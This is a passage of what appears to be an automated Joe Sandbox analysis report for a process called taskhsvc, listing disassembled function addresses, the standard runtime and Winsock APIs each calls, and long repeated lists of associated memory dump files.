    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00318F30, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49
    APIs
    • abort.MSVCRT ref: 00318F86
    • localtime.MSVCRT ref: 00318F91
    • memcpy.MSVCRT ref: 00318FB4
      • Part of subcall function 00318C53: memset.MSVCRT ref: 00318E92
      • Part of subcall function 00318C53: strerror.MSVCRT ref: 00318EAA
      • Part of subcall function 00318C53: __stack_chk_fail.LIBSSP-0 ref: 00318F24
    • __stack_chk_fail.LIBSSP-0 ref: 00318FE5
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0032107E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47
    APIs
    • abort.MSVCRT ref: 003210D1
    • malloc.MSVCRT ref: 003210E9
    • __stack_chk_fail.LIBSSP-0 ref: 0032113D
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • exit.MSVCRT ref: 0032112A
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 003213EE, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44
    APIs
    • abort.MSVCRT ref: 0032143E
    • _strdup.MSVCRT ref: 00321449
    • __stack_chk_fail.LIBSSP-0 ref: 0032149D
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • exit.MSVCRT ref: 0032148A
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001EE76C, Relevance: 7.8, APIs: 5, Instructions: 329
    APIs
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
    • strcmp.MSVCRT ref: 001EE905
      • Part of subcall function 0032DA95: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,002564FC), ref: 0032DAE3
    • __stack_chk_fail.LIBSSP-0 ref: 001EEBD6
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 001EEA71
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
      • Part of subcall function 0032B7BA: memset.MSVCRT ref: 0032B7F8
      • Part of subcall function 0032B7BA: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001EEAEA), ref: 0032B8FC
      • Part of subcall function 0032DFE3: __stack_chk_fail.LIBSSP-0 ref: 0032E043
    • free.MSVCRT ref: 001EEB46
    • free.MSVCRT ref: 001EEB67
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
      • Part of subcall function 001EB015: bind.WS2_32 ref: 001EB3B3
      • Part of subcall function 001EB015: abort.MSVCRT ref: 001EB5FE
      • Part of subcall function 001EB015: memcpy.MSVCRT ref: 001EB6C7
      • Part of subcall function 001EB015: abort.MSVCRT ref: 001EB862
      • Part of subcall function 001EB015: __stack_chk_fail.LIBSSP-0 ref: 001EB8E9
      • Part of subcall function 001EAD69: __stack_chk_fail.LIBSSP-0 ref: 001EAE0F
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BA5
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BC7
      • Part of subcall function 00319B70: __stack_chk_fail.LIBSSP-0 ref: 00319BE1
      • Part of subcall function 00319ED4: __stack_chk_fail.LIBSSP-0 ref: 00319F7B
      • Part of subcall function 0031A905: abort.MSVCRT ref: 0031A95C
      • Part of subcall function 0031A905: abort.MSVCRT ref: 0031A99A
      • Part of subcall function 0031A905: abort.MSVCRT ref: 0031A9DE
      • Part of subcall function 0031A905: __stack_chk_fail.LIBSSP-0 ref: 0031AA35
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0024DAFE, Relevance: 7.7, APIs: 5, Instructions: 242
    APIs
    • abort.MSVCRT ref: 0024DB99
      • Part of subcall function 00241D3F: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,0024DBC0), ref: 00241D66
    • __stack_chk_fail.LIBSSP-0 ref: 0024DE68
      • Part of subcall function 00241CFF: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0024DBD1), ref: 00241D38
      • Part of subcall function 003213EE: abort.MSVCRT ref: 0032143E
      • Part of subcall function 003213EE: _strdup.MSVCRT ref: 00321449
      • Part of subcall function 003213EE: exit.MSVCRT ref: 0032148A
      • Part of subcall function 003213EE: __stack_chk_fail.LIBSSP-0 ref: 0032149D
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
      • Part of subcall function 0032BBAB: memset.MSVCRT ref: 0032BBD7
      • Part of subcall function 0032BBAB: __stack_chk_fail.LIBSSP-0 ref: 0032BBF0
    • memcpy.MSVCRT ref: 0024DD2D
    • memcpy.MSVCRT ref: 0024DD5A
      • Part of subcall function 00316107: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,0021FAF4), ref: 003161A4
      • Part of subcall function 00316107: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0021FAF4), ref: 003161B7
      • Part of subcall function 0032D7F2: abort.MSVCRT ref: 0032D854
      • Part of subcall function 0032D7F2: abort.MSVCRT ref: 0032D893
      • Part of subcall function 0032D7F2: memcpy.MSVCRT ref: 0032D8AD
      • Part of subcall function 0032D7F2: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001F57C7), ref: 0032D8C0
    • memcpy.MSVCRT ref: 0024DDF6
      • Part of subcall function 00315895: strlen.MSVCRT ref: 003158CA
      • Part of subcall function 00315895: __stack_chk_fail.LIBSSP-0 ref: 00315904
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 0032DFE3: __stack_chk_fail.LIBSSP-0 ref: 0032E043
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Memory Dump Source
    • Source File: 00000013.00000002.1855104216.00230000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0031FB67, Relevance: 7.6, APIs: 5, Instructions: 143
    APIs
    • abort.MSVCRT ref: 0031FBC3
    • abort.MSVCRT ref: 0031FC02
    • abort.MSVCRT ref: 0031FC41
      • Part of subcall function 0031E576: memcpy.MSVCRT ref: 0031E5AA
      • Part of subcall function 0031E576: __stack_chk_fail.LIBSSP-0 ref: 0031E5BB
      • Part of subcall function 0031DEF4: memset.MSVCRT ref: 0031DFEF
      • Part of subcall function 0031DEF4: memset.MSVCRT ref: 0031E0F6
      • Part of subcall function 0031DEF4: __stack_chk_fail.LIBSSP-0(?), ref: 0031E1CC
      • Part of subcall function 0031C60C: __stack_chk_fail.LIBSSP-0 ref: 0031C643
      • Part of subcall function 0031DA66: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,0031FCAF), ref: 0031DAF3
    • __stack_chk_fail.LIBSSP-0 ref: 0031FD78
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 0031FCEC
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
      • Part of subcall function 0031E650: memcpy.MSVCRT ref: 0031E684
      • Part of subcall function 0031E650: __stack_chk_fail.LIBSSP-0 ref: 0031E695
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
